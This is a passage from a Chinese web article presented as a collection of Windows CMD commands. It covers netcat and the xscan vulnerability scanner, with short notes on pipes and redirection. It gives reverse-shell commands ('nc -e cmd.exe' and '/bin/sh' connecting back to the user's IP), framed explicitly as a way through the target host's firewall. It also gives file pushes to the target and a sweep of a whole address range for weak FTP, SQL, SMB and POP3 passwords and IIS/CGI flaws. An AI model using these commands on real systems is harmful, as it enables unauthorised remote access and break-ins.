Windows CMD命令大全(值得收藏)

2019-09-19 06:36:31王冬梅

  type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用

  本机上用:nc -l -p 本机端口

  在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K

  nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙

  本机上用:nc -d -l -p 本机端口 < 要传送的文件路径及名称

  在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机

  备 注:

  | 管道命令

  < 或 > 重定向命令。“<”,例如:tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令

  @ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:winnt >> d:log.txt 意思是:后台执行dir,并把结果存在d:log.txt中

  >与>>的区别 ">"指:覆盖;">>"指:保存到(添加到)。

  如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。

  八:

  扫描工具:xscan.exe

  基本格式

  xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息

  xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息

  检测项目

  -active 检测主机是否存活

  -os 检测远程操作系统类型(通过NETBIOS和SNMP协议)

  -port 检测常用服务的端口状态

  -ftp 检测FTP弱口令

  -pub 检测FTP服务匿名用户写权限

  -pop3 检测POP3-Server弱口令

  -smtp 检测SMTP-Server漏洞

  -sql 检测SQL-Server弱口令

  -smb 检测NT-Server弱口令

  -iis 检测IIS编码/解码漏洞

  -cgi 检测CGI漏洞

  -nasl 加载Nessus攻击脚本

  -all 检测以上所有项目

  其它选项

  -i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取

  -l 显示所有网络适配器

  -v 显示详细扫描进度

  -p 跳过没有响应的主机

  -o 跳过没有检测到开放端口的主机

  -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10

  -log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)

  用法示例

  xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机

相关文章 大家在看